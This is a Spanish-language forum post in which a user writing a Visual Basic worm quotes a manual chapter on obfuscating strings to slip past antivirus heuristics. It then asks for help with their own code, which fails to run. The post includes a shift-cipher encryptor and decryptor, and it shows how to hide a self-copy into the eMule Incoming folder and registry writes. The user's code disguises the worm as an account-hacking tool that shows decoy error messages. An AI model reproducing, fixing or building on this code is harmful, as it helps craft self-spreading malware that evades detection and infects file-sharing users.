|
Veran estoy haciendo un worm en vb i me he fijado en una cosa muy escencial y escasa la encryptacion antiheuristica de los av,s lo saque del manual de hendrix os lo pongo para facilitar las cosas
---------------------------------------------------------------------------------------------------------
5. Encriptacion Anti-Huristica de los AV's
Weno, en este Capitulo aprendremos a cifrar las strings para que los AV's con Heuristica (El D32) no nos detecten nuestro Bichito.
Weno, para empezar yo me hice un Programa bastante util que lo que hace es encriptarte lo que kieres enkriptar en el Worm, ahora os pondre el Code de este programa:
Coo:
Weno, para crearlo necesitamos 2 Textbos (uno para la frase cifrada y otro para la frase descifrada) y 3 CommandButtons (uno para cifrar, otro para descifrar y otro para salir del programa)
Public Function q(j)
On Error Resume Next
For R = 1 To Len(j)
q = q & Chr(Asc(Mid(j, R, 1)) + 14)
Next
End Function
Public Function des(p)
On Error Resume Next
For R = 1 To Len(p)
des = des & Chr(Asc(Mid(p, R, 1)) - 14)
Next
End Function
Private Sub Command1_Click()
Text2.Text = q(Text1.Text)
Text1.Text = ""
End Sub
Private Sub Command2_Click()
Text1.Text = des(Text2.Text)
Text2.Text = ""
End Sub
Private Sub Command3_Click()
End
End SubWeno, una vez compilado esto ya disponemos de una buena herramienta de Encriptacion, ahora solo tenemos que decidir que cifrar...
Pero antes, en el Worm tenemos que definir una funcion para que desenkripte los datos que le pasaremos cifrados.
Sera esta funcion:
Coode:
Public Function des(p)
On Error Resume Next
For R = 1 To Len(p)
des = des & Chr(Asc(Mid(p, R, 1)) - 14)
Next
End Function
Weno, ahora por ejemplo, si nuestro Worm se tiene que copiar en el Emule ariamos esto:
en el programa encriptador pondriamos en el Textbox1 esto:
C:\Archivos de Programa\eMule\Incoming\Worm.exe
presionariamos en cifrar y nos mostraria el resultado en el Textbox2, luego al resultados le hacemos un Copy y lo pegamos en nuestro Wrom así:
FileCopy App.Path & App.EXEName & ".exe", q("Mensaje del textbox")
Y esto kuando lo ejekutemos nos desencriptaria la llave y nos copiaria el Worm en el eMule...
Esto por ejemplo, sirve bastante para agregarlo al registro, porke el D32 lo pilla si se intenta copiar al registro...
Weno, que sepan que esta forma de encriptacion es MUY SIMPLE, que hay muchisimas de mejores y mas dificiles de descifrar, pero kreo que kon esto eskivamos el D32, pero klaro, en el ejemplo puse:
Code:
q = q & Chr(Asc(Mid(j, R, 1)) + 14)
y este + 14 lo pueden cambiar por kualkier n º, pero kuidado de que no sea muy grande el n º, porke si sobrepasa el n º de caracteres ASCII saldra error....
Weno, Capitulo importante pero corto....
---------------------------------------------------------------------------------------------------------
Bueno pues yo he seguido las instruciones haciendo el encryptador he encryptado la ruta y lo he aplicado a mi code, el problema es que me sale erroe "Procedimiento Sub o funcion no definido" i me marca en amarillo una linea bueno aki les dejo mi code:
---------------------------------------------------------------------------------------------------------
Public Function des(p)
On Error Resume Next
For R = 1 To Len(p)
des = des & Chr(Asc(Mid(p, R, 1)) - 128)
Next
End Function
Private Sub Form_Load()
FileCopy App.Path & "\" & App.EXEName & ".exe", q("ãÜæéìå®åøå")
End Sub
Private Sub Command1_Click(Index As Integer)
MsgBox "Error imposible de realizar la accion comprueba antes tu usuario"
End Sub
Private Sub Command2_Click()
MsgBox "Tu id de cuenta no es posible piratear espera las actualizacione s"
End Sub
Private Sub Command3_Click(Index As Integer)
End
End Sub
|
Mostrar Temas
